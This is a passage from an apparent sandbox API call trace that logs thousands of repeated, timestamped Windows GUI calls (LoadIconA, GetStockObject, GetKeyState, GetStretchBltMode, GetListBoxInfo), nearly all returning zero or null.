returned 0x0 [0149.997] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.997] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.997] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.997] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.997] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.998] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.998] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.998] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.998] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.998] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.998] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0154.526] GetKeyState (nVirtKey=1) returned 0 [0154.526] GetStretchBltMode (hdc=0x1) returned 0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.527] GetKeyState (nVirtKey=1) returned 0 [0154.527] GetStretchBltMode (hdc=0x1) returned 0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.527] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.528] GetKeyState (nVirtKey=1) returned 0 [0154.528] GetStretchBltMode (hdc=0x1) returned 0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.528] GetKeyState (nVirtKey=1) returned 0 [0154.528] GetStretchBltMode (hdc=0x1) returned 0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.528] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.529] GetKeyState (nVirtKey=1) returned 0 [0154.529] GetStretchBltMode (hdc=0x1) returned 0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.529] GetKeyState (nVirtKey=1) returned 0 [0154.529] GetStretchBltMode (hdc=0x1) returned 0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.529] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.530] GetKeyState (nVirtKey=1) returned 0 [0154.530] GetStretchBltMode (hdc=0x1) returned 0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.530] GetKeyState (nVirtKey=1) returned 0 [0154.530] GetStretchBltMode (hdc=0x1) returned 0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.530] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.531] GetKeyState (nVirtKey=1) returned 0 [0154.531] GetStretchBltMode (hdc=0x1) returned 0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.531] GetKeyState (nVirtKey=1) returned 0 [0154.531] GetStretchBltMode (hdc=0x1) returned 0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.531] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.532] GetKeyState (nVirtKey=1) returned 0 [0154.532] GetStretchBltMode (hdc=0x1) returned 0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.532] GetKeyState (nVirtKey=1) returned 0 [0154.532] GetStretchBltMode (hdc=0x1) returned 0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.532] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.533] GetKeyState (nVirtKey=1) returned 0 [0154.533] GetStretchBltMode (hdc=0x1) returned 0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.533] GetKeyState (nVirtKey=1) returned 0 [0154.533] GetStretchBltMode (hdc=0x1) returned 0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.533] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.534] GetKeyState (nVirtKey=1) returned 0 [0154.534] GetStretchBltMode (hdc=0x1) returned 0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetStockObject (i=789644) returned 0x0 [0154.534] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.534] GetKeyState (nVirtKey=1) returned 0 [0154.534] GetStretchBltMode (hdc=0x1) returned 0 [0154.534] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.534] GetKeyState (nVirtKey=1) returned 0 [0154.534] GetStretchBltMode (hdc=0x1) returned 0 [0154.535] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.535] GetKeyState (nVirtKey=1) returned 0 [0154.535] GetStretchBltMode (hdc=0x1) returned 0 [0154.535] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.535] GetKeyState (nVirtKey=1) returned 0 [0154.535] GetStretchBltMode (hdc=0x1) returned 0 [0154.535] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.535] GetKeyState (nVirtKey=1) returned 0 [0154.535] GetStretchBltMode (hdc=0x1) returned 0 [0154.535] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.535] GetKeyState (nVirtKey=1) returned 0 [0154.535] GetStretchBltMode (hdc=0x1) returned 0 [0154.535] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.535] GetKeyState (nVirtKey=1) returned 0 [0154.535] GetStretchBltMode (hdc=0x1) returned 0 [0154.535] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.535] GetKeyState (nVirtKey=1) returned 0 [0154.535] GetStretchBltMode (hdc=0x1) returned 0 [0154.535] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.535] GetKeyState (nVirtKey=1) returned 0 [0154.535] GetStretchBltMode (hdc=0x1) returned 0 [0154.535] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.535] GetKeyState (nVirtKey=1) returned 0 [0154.535] GetStretchBltMode (hdc=0x1) returned 0 [0154.535] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.535] GetKeyState (nVirtKey=1) returned 0 [0154.536] GetStretchBltMode (hdc=0x1) returned 0 [0154.536] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.536] GetKeyState (nVirtKey=1) returned 0 [0154.536] GetStretchBltMode (hdc=0x1) returned 0 [0154.536] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.536] GetKeyState (nVirtKey=1) returned 0 [0154.536] GetStretchBltMode (hdc=0x1) returned 0 [0154.536] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.536] GetKeyState (nVirtKey=1) returned 0 [0154.536] GetStretchBltMode (hdc=0x1) returned 0 [0154.536] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.536] GetKeyState (nVirtKey=1) returned 0 [0154.536] GetStretchBltMode (hdc=0x1) returned 0 [0154.536] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.536] GetKeyState (nVirtKey=1) returned 0 [0154.536] GetStretchBltMode (hdc=0x1) returned 0 [0154.536] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.536] GetKeyState (nVirtKey=1) returned 0 [0154.536] GetStretchBltMode (hdc=0x1) returned 0 [0154.536] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.536] GetKeyState (nVirtKey=1) returned 0 [0154.536] GetStretchBltMode (hdc=0x1) returned 0 [0154.536] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.536] GetKeyState (nVirtKey=1) returned 0 [0154.536] GetStretchBltMode (hdc=0x1) returned 0 [0154.536] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.537] GetKeyState (nVirtKey=1) returned 0 [0154.537] GetStretchBltMode (hdc=0x1) returned 0 [0154.537] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.537] GetKeyState (nVirtKey=1) returned 0 [0154.537] GetStretchBltMode (hdc=0x1) returned 0 [0154.537] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.537] GetKeyState (nVirtKey=1) returned 0 [0154.537] GetStretchBltMode (hdc=0x1) returned 0 [0154.537] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.537] GetKeyState (nVirtKey=1) returned 0 [0154.537] GetStretchBltMode (hdc=0x1) returned 0 [0154.537] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.537] GetKeyState (nVirtKey=1) returned 0 [0154.537] GetStretchBltMode (hdc=0x1) returned 0 [0154.537] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.537] GetKeyState (nVirtKey=1) returned 0 [0154.537] GetStretchBltMode (hdc=0x1) returned 0 [0154.537] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.537] GetKeyState (nVirtKey=1) returned 0 [0154.537] GetStretchBltMode (hdc=0x1) returned 0 [0154.537] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.537] GetKeyState (nVirtKey=1) returned 0 [0154.537] GetStretchBltMode (hdc=0x1) returned 0 [0154.537] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.537] GetKeyState (nVirtKey=1) returned 0 [0154.537] GetStretchBltMode (hdc=0x1) returned 0 [0154.537] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.538] GetKeyState (nVirtKey=1) returned 0 [0154.538] GetStretchBltMode (hdc=0x1) returned 0 [0154.538] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.538] GetKeyState (nVirtKey=1) returned 0 [0154.538] GetStretchBltMode (hdc=0x1) returned 0 [0154.538] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.538] GetKeyState (nVirtKey=1) returned 0 [0154.538] GetStretchBltMode (hdc=0x1) returned 0 [0154.538] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.538] GetKeyState (nVirtKey=1) returned 0 [0154.538] GetStretchBltMode (hdc=0x1) returned 0 [0154.538] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.538] GetKeyState (nVirtKey=1) returned 0 [0154.538] GetStretchBltMode (hdc=0x1) returned 0 [0154.538] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.538] GetKeyState (nVirtKey=1) returned 0 [0154.538] GetStretchBltMode (hdc=0x1) returned 0 [0154.538] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.538] GetKeyState (nVirtKey=1) returned 0 [0154.538] GetStretchBltMode (hdc=0x1) returned 0 [0154.538] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.538] GetKeyState (nVirtKey=1) returned 0 [0154.538] GetStretchBltMode (hdc=0x1) returned 0 [0154.538] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.538] GetKeyState (nVirtKey=1) returned 0 [0154.538] GetStretchBltMode (hdc=0x1) returned 0 [0154.538] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.539] GetKeyState (nVirtKey=1) returned 0 [0154.539] GetStretchBltMode (hdc=0x1) returned 0 [0154.539] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.539] GetKeyState (nVirtKey=1) returned 0 [0154.539] GetStretchBltMode (hdc=0x1) returned 0 [0154.539] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.539] GetKeyState (nVirtKey=1) returned 0 [0154.539] GetStretchBltMode (hdc=0x1) returned 0 [0154.539] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.539] GetKeyState (nVirtKey=1) returned 0 [0154.539] GetStretchBltMode (hdc=0x1) returned 0 [0154.539] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.539] GetKeyState (nVirtKey=1) returned 0 [0154.539] GetStretchBltMode (hdc=0x1) returned 0 [0154.539] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.539] GetKeyState (nVirtKey=1) returned 0 [0154.539] GetStretchBltMode (hdc=0x1) returned 0 [0154.539] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.539] GetKeyState (nVirtKey=1) returned 0 [0154.539] GetStretchBltMode (hdc=0x1) returned 0 [0154.539] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.539] GetKeyState (nVirtKey=1) returned 0 [0154.539] GetStretchBltMode (hdc=0x1) returned 0 [0154.539] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.539] GetKeyState (nVirtKey=1) returned 0 [0154.539] GetStretchBltMode (hdc=0x1) returned 0 [0154.539] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.540] GetKeyState (nVirtKey=1) returned 0 [0154.540] GetStretchBltMode (hdc=0x1) returned 0 [0154.540] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.540] GetKeyState (nVirtKey=1) returned 0 [0154.540] GetStretchBltMode (hdc=0x1) returned 0 [0154.540] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.540] GetKeyState (nVirtKey=1) returned 0 [0154.540] GetStretchBltMode (hdc=0x1) returned 0 [0154.540] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.540] GetKeyState (nVirtKey=1) returned 0 [0154.540] GetStretchBltMode (hdc=0x1) returned 0 [0154.540] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.540] GetKeyState (nVirtKey=1) returned 0 [0154.540] GetStretchBltMode (hdc=0x1) returned 0 [0154.540] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.540] GetKeyState (nVirtKey=1) returned 0 [0154.540] GetStretchBltMode (hdc=0x1) returned 0 [0154.540] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.540] GetKeyState (nVirtKey=1) returned 0 [0154.540] GetStretchBltMode (hdc=0x1) returned 0 [0154.540] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.540] GetKeyState (nVirtKey=1) returned 0 [0154.540] GetStretchBltMode (hdc=0x1) returned 0 [0154.540] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.540] GetKeyState (nVirtKey=1) returned 0 [0154.540] GetStretchBltMode (hdc=0x1) returned 0 [0154.541] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.541] GetKeyState (nVirtKey=1) returned 0 [0154.541] GetStretchBltMode (hdc=0x1) returned 0 [0154.541] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.541] GetKeyState (nVirtKey=1) returned 0 [0154.541] GetStretchBltMode (hdc=0x1) returned 0 [0154.541] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.541] GetKeyState (nVirtKey=1) returned 0 [0154.541] GetStretchBltMode (hdc=0x1) returned 0 [0154.541] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.541] GetKeyState (nVirtKey=1) returned 0 [0154.541] GetStretchBltMode (hdc=0x1) returned 0 [0154.541] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.541] GetKeyState (nVirtKey=1) returned 0 [0154.541] GetStretchBltMode (hdc=0x1) returned 0 [0154.541] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.541] GetKeyState (nVirtKey=1) returned 0 [0154.541] GetStretchBltMode (hdc=0x1) returned 0 [0154.541] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.541] GetKeyState (nVirtKey=1) returned 0 [0154.541] GetStretchBltMode (hdc=0x1) returned 0 [0154.541] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.541] GetKeyState (nVirtKey=1) returned 0 [0154.541] GetStretchBltMode (hdc=0x1) returned 0 [0154.541] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.541] GetKeyState (nVirtKey=1) returned 0 [0154.541] GetStretchBltMode (hdc=0x1) returned 0 [0154.542] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.542] GetKeyState (nVirtKey=1) returned 0 [0154.542] GetStretchBltMode (hdc=0x1) returned 0 [0154.542] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.542] GetKeyState (nVirtKey=1) returned 0 [0154.542] GetStretchBltMode (hdc=0x1) returned 0 [0154.542] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.545] GetKeyState (nVirtKey=1) returned 0 [0154.545] GetStretchBltMode (hdc=0x1) returned 0 [0154.545] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.545] GetKeyState (nVirtKey=1) returned 0 [0154.545] GetStretchBltMode (hdc=0x1) returned 0 [0154.545] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.545] GetKeyState (nVirtKey=1) returned 0 [0154.545] GetStretchBltMode (hdc=0x1) returned 0 [0154.545] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.545] GetKeyState (nVirtKey=1) returned 0 [0154.545] GetStretchBltMode (hdc=0x1) returned 0 [0154.545] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.545] GetKeyState (nVirtKey=1) returned 0 [0154.545] GetStretchBltMode (hdc=0x1) returned 0 [0154.545] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.546] GetKeyState (nVirtKey=1) returned 0 [0154.546] GetStretchBltMode (hdc=0x1) returned 0 [0154.546] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.546] GetKeyState (nVirtKey=1) returned 0 [0154.546] GetStretchBltMode (hdc=0x1) returned 0 [0154.546] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.546] GetKeyState (nVirtKey=1) returned 0 [0154.546] GetStretchBltMode (hdc=0x1) returned 0 [0154.546] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.546] GetKeyState (nVirtKey=1) returned 0 [0154.546] GetStretchBltMode (hdc=0x1) returned 0 [0154.546] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.546] GetKeyState (nVirtKey=1) returned 0 [0154.546] GetStretchBltMode (hdc=0x1) returned 0 [0154.546] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.546] GetKeyState (nVirtKey=1) returned 0 [0154.546] GetStretchBltMode (hdc=0x1) returned 0 [0154.546] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.546] GetKeyState (nVirtKey=1) returned 0 [0154.546] GetStretchBltMode (hdc=0x1) returned 0 [0154.546] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.546] GetKeyState (nVirtKey=1) returned 0 [0154.546] GetStretchBltMode (hdc=0x1) returned 0 [0154.546] GetListBoxInfo (hwnd=0x0) returned 0x0 [0154.546] GetKeyState (nVirtKey=1) returned 0 [0154.546] GetStretchBltMode (hdc=0x1) returned 0 